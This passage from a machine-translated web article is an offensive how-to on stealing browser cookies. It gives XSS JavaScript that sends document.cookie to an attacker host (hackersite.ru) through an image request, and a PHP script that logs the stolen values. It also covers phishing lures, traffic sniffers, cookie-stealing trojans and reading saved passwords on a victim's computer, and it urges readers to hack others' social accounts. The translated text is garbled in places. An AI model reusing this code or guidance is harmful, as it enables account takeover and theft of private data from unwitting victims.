(external.Menuarguments.Document.Cookie);</i><i><br></i></p><p>Step 7: Perform again step 5, and then we update the page.</p><p>Outcome: We will go to this Internet resource with updated cookies.</p><p><b>How to steal cookies with JavaScript?</b><b><br></b><br></p><p>If the attacker managed to find the ability to perform an arbitrary JavaScript script on the sacrifice computer, then read the current cookie it can be very easy. Example:</p><br><p>var str \u003d document.cookie;</p><p>But whether he can transfer them to his site, because, as I pointed out earlier, the JavaScript script will not be able to contact the site in another domain without further confirmation? It turns out that the JavaScript script can download any picture on any HTTP server. In this case, transmit any text information in the download request for this picture. Example: <i>http://hackersite.ru/xss.jpg?text_info.</i>Therefore, if you execute this code:</p><p>var img \u003d. <span>new image ();</p><p>img.src \u003d. <span>"http://hackersite.ru/xss.jpg?"</span>+ Encodeuri (Document.Cookie);</span><br></p><br> then cookie will be in the request for downloading "pictures" and "leave" to an attacker. <p><b>How to process such requests to download "pictures"?</b><b><br></b><br></p><p>An attacker only needs to find hosting with PHP support and accommodate code there is similar to this:</p><p><?<br> $ UID \u003d URLDECODE ($ _ Server ["query_string"]); <br> $ FP \u003d Fopen ("Log.txt", "A"); <br> FPUTS ($ FP, "$ UID \\ N"); <br> FClose ($ FP); <br> ?><br></p><p>Then all query settings for this script will be stored in the file. <i>log.txt</i>. It remains only in the previously described JavaScript script replace <i>http://hackersite.ru/xss.jpg.</i> On the path to this php script.</p><br><b>Outcome</b><b><br></b><br><p>I showed only the easiest way to use XSS vulnerabilities. But this proves that the presence of at least one such vulnerabilities on a multiplayer website can allow an attacker to use its resources from your behalf.</p> <p><b>Methods of stealing cookie files</b> </p><p>Such a hacking method as cookies is perfect and used by many hackers. If you also want to try it, but do not know what to do, read our recommendations.</p><p><b>What is cookies?</b> </span><br><span><br> This is the information about visiting the user of a particular site. It is stored in a separate text document. There you can find a different information. Including logins, passwords, postal mailbox addresses and phone numbers. That is why hackers seek to get these documents. To steal the necessary materials, hackers are resorted to different methods.</p><p><b>Methods of stealing cookies</b> </span><br><span><br><i><b>XSS vulnerability</b> </i></p><p>It can be found and used on any site. When a specialist finds a vulnerability, he introduces a special code into it. Depending on the purpose of the codes are different, they are written under a specific resource. When the user comes to this page and updates it, all changes are applied. Code Start act - it is embedded in the victim's computer and collects all the necessary information from the browser.</p><p>To make the code, you can use any type of vulnerabilities - an error on the web resource in the browser or computer system.</p><p><b>There are 2 types of XSS attacks:</b></p><p><i><b>Passive</b> </i> </span>- Aims on the script page. In this case, you need to look for vulnerable places in the page elements. For example, tab with dialogs, search box, video catalog, etc.</p><p><b><i>Active</i> </b> - They should be signed on the server. Particularly often on various forums, blogs and chat rooms.</p><p><b>How to make a person apply XSS?</b></p><p>The task is not easy, because often to activate the code you want to click on the link with it. You can disguise the link and send in the letter along with an interesting offer. For example, to offer a big discount in the online store. You can also implement it all in the picture. The user is likely to watch it and will not suspect anything.</p><p><b><i>Installing Sniffera</i> </b></p><p>This is the introduction of specialized programs for tracking traffic on someone else's device. Sniffer allows you to intercept transmitted sessions with other people's data. So you can get all the logins and passwords, addresses, any important information transmitted by the user. At the same time, attacks are most often carried out on unprotected HTTP data. For this, unprotected Wi-Fi is well suited.</p><p><b>You can implement Sniffer in several ways:</b> </p><ul><li><span>Copy traffic;</span></li> <li><span>Data analysis using attacks on traffic;</span></li> <li><span>Listening to interfaces;</span></li> <li><span>Implementing a sniffer into channel break.</span></li> </ul><span><b><i>Substitution Cookies.</i> </b><p>All data is stored on a web server in original form. If you change them, it will be considered a substitution. All materials obtained can be used on another computer. So you will receive full access to the user's personal data. You can modify cookies using settings in the browser, addons or special programs. Editing is also possible in any standard notebook on PC.</p></span><p><i><b>Cookies with virus</b> </i></p><p>Specialists advise not to use cookies, if there is no special need for it. If it is possible to turn them off, it is better to do it. All because cookies are very vulnerable. They often steal attackers. From these files, you can get a huge number of personal confidential information that will be used against a person. The most dangerous view of the files - those that remain in the system when the session is already completed.</p><p>Cookies often steal with the help of a viral utility. It is done quite simple. A virus is introduced into any safe utility that collects certain materials on the computer. The viral program will be associated with the server of its host. The program must be configured so that the browser uses it as a proxy server.</p><p>When the prog falls on the victim's PC, it will automatically start collecting all stored data and send them to you.</p><p>Viruses are different, they may also differ. Some allow you to fully control the browser and view any information. Others are able to steal protected materials. Third collect only unprotected data.</p><p>You may have difficulty with the introduction of a viral program on someone else's computer. You must force the user to download it and run. Here you can either send him a letter with reference to the program, or give the program for a safe and wait, when a person himself crashes it from your site.</p><p><b>How to protect cookies Files from theft?</b> </p><p>Most of the web resources are not protected enough. Hackers easily find vulnerabilities and errors on these platforms.</p><p><b>Cook protection rules:</b> </p><ol><li><span>Bind the computer ID to the current session. Then, when entering the site from an extraneous device, a new session will be started, the data from the previous will not work.</span></li> <li><span>Tie a session to the browser. The same principle will work as in the previous paragraph.</span></li> <li><span>Encrypt the parameters transmitted over the network. Then the information saved in the document cannot be understood. It will be useless for who intercepted it. This reception will not protect you 100%, some experts know how to decipher any materials.</span></li> <li><span>Create a separate folder for the individuals.</span></li> </ol><p><b>How to find out the password from someone else's account through cookies?</b> </p><p>To get other people's authorization data, you must first get to the file in which they were saved.</p><p>For those who use Mozilla Firefox, you need to go to the Tools tab, which is in the main menu. Next, in the system settings you will find the "Protection" section, there and you should look for all important information about accounts in social networks. All passwords are hidden, so click on the "Display" button. Immediately you can install protection and deliver a special code. Then no one except you get this information.</p><p>Opera for general viewing is available only by user names. But in the menu you can find the password manager and view all stored on the computer. Full list is in the manager. In order to access passwords, you need to install additional extension.</p><p>In Google Chrome, all these materials can be seen in the extended settings. There is a tab with all stored cookies.</p><p>Unfortunately, the Standard Internet Explorer browser does not have such functions. To find out information about web platforms, which visits the PC owner, you need to download a special program. On the Internet it can be found for free, it is completely safe, but it is better to load it from proven sources. Do not forget that any program must be checked by antivirus. This is especially true of those utilities that work with passwords.</p><p>This technique suits only those who have physical access to the victim's computer. You can also find out someone else's password if a person logged in on the platform through your PC and saved his data.</p><p><b>Programs for theft of cookie files</b> </p><p>On the Internet there was a lot of hacker forumJD, on which hackers communicate with each other. People come there hoping to get free help. It is there that you can find a huge number of different programs for hacking. We want to warn you that you should not trust these programs. Utilities for remote stealing cookies from someone else's device - pacifiers, or viral programs. If you download this software to your PC, then most likely you will take a trap of the fraudster. Free Place Zhuliki Programs. Thus, they distribute viral software and receive control over other people's PCs. In general, such programs are divorce, you will understand this by their interface and content. If you are collecting how to use any software for mining files, then let it be sniffer. Of course, they are not so easy to use. Yes, and find a good sniffer on the Internet is not easy. But there is such a software from specialists who can sell it for money. Remember that scammers are a lot, everyone has their own tricks. Trying only to proven hackers who have a good reputation, there are reviews and there are our own website.</p><p>In conclusion, I would like to note that Cook's theft is a really powerful method, the effectiveness of which is very high. If you want to hack someone's profile in the social network or messenger, be sure to consider this option. Best of all this method works when you can use the sacrifice computer. It is much more difficult to get materials at a distance, but you can use our advice and try to apply this method in practice.</p><p>In chapter</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </div> </div> </div> <div id="sidebar" class="span4 sidebar_right"> <div class="inside"> <div class="sidebar_module sidebar_module_"> <h3 class="sidebar_module_heading"><span>Last</span></h3> <div class="sidebar_module_content"> <ul class="nav menu"> <li class="item"><a href="https://neonkaraoke.ru/en/internet/shema-podklyucheniya-nezavisimogo-rascepitelya-220v-avtomaticheskii-vyklyuchatel-s-nezavisimym-rascepitel/">Automatic switch with independent release</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/internet/chem-dif-otlichaetsya-ot-uzo-difavtomaty-differencialnye-avtomaticheskie/">Favtomatomats (differential circuit breakers) and RCDs What is the difference?</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/internet/podklyuchenie-rascepitelya-k-pultu-pozharnoi-signalizacii-shema-podklyucheniya/">Independent Quaker Connection Scheme</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/news/odinarnyi-pereklyuchatel-chto-takoe-prohodnoi-vyklyuchatel/">What is the passage switch</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/mts-bank/soedinenie-provodov-10-kvadratov-kak-nastroit-lokalnuyu-set-mezhdu-dvumya/">How to set up a local network between two computers</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/services/kak-svyazat-kompyutery-set-mezhdu-dvumya-kompyuterami-ili-noutbukami/">Network between two computers or laptops</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/rates/otrabotaet-li-avtomaticheskii-vyklyuchatel-esli-zastoporit/">Why knocks out the machine in the shield</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/internet/rassmotrim-kakoi-stabilizator-napryazheniya-vybrat-gramotnyi-vybor/">Competent choice of voltage stabilizer stable voltage</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/rates/kakoi-uzo-vybrat-zachem-uzo-na-vvode-v-chastnyi-dom-kakoe/">Why is the UDO at entering a private house?</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/services/podklyuchenie-vyklyuchatelya-svoimi-rukami-shema-podklyucheniya-vyklyuchatelya/">Connecting the light switch with one key: Installation and replacement of the switch</a></li> </ul> </div> </div> <div class="sidebar_module sidebar_module_"> <h3 class="sidebar_module_heading"><span>It is necessary to know</span></h3> <div class="sidebar_module_content"> <ul class="nav menu"> <li class="item"><a href="https://neonkaraoke.ru/en/rates/gps-navigator-svoimi-rukami-staticheskie-karty-vybor-i-ispolzovanie-personalnyh-navigatorov-gps-d/">Selection and use of personal GPS navigators</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/mts-bank/kak-zapravit-poroshkovyi-kartridzh-v-domashnih-usloviyah-kak-zapravit/">How to fix the laser cartridge correctly?</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/services/superprostaya-podstavka-dlya-plansheta-iz-konteinera-dlya-diskov/">Stand for tablet from PVC pipes with their own hands Stand for a tablet from a hanger</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/news/kak-izgotovit-podstavku-dlya-plansheta-iz-orgstekla-kak-delaetsya-podstavka-dlya/">How is the stand for the tablet do it yourself?</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/services/kak-pravilno-ustanovit-ili-pomenyat-processor-na-materinskoi/">How to change the processor on a computer to more powerful (is it possible on a laptop if you can replace the processor in a personal computer</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/rates/zamena-processora-noutbuka-na-bolee-moshchnyi-poshagovaya-instrukciya-kak-pomenyat/">How to change the processor on a computer to a more powerful change processor on a PC</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/rates/kak-iz-velosipednogo-kolesa-sdelat-antennu-televizionnaya-antenna-iz-diska/">Television antenna from the drive from the drive for the EU series of EUM</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/internet/samodelnye-radioelektronnye-ustroistva-radiolyubitelskie-shemy-i/">Radio Schemes and Homemakes, collected by their own hands</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/services/akvarium-iz-starogo-televizora-kak-iz-starenkogo-televizora-sdelat/">How to make an aquarium for fish from an old TV</a></li> <li class="item"><a href="https://neonkaraoke.ru/en/mts-bank/ochki-nochnogo-videniya-kak-sdelat-iz-chivo-pribor-nochnogo-videniya-svoimi/">Night vision device with their own hands</a></li> </ul> </div> </div> <div class="sidebar_module sidebar_module_"> </div> </div> </div> </div> </div> </section> <footer id="footer" class="container"> <div id="copyright"> <div> <p class="copytext"> 2021 NEONKARAOKE.RU - Internet. News. Tariffs. Services. MTS</p> <ul class="nav menu"> <li class="item-113"><a href="https://neonkaraoke.ru/en/sitemap.xml">site `s map</a></li> </ul> </div> </div> </footer> <div id="gotop" class=""> <a href="#" class="scrollup">TPL_TPL_FIELD_SCROLL</a> </div> </body> </html>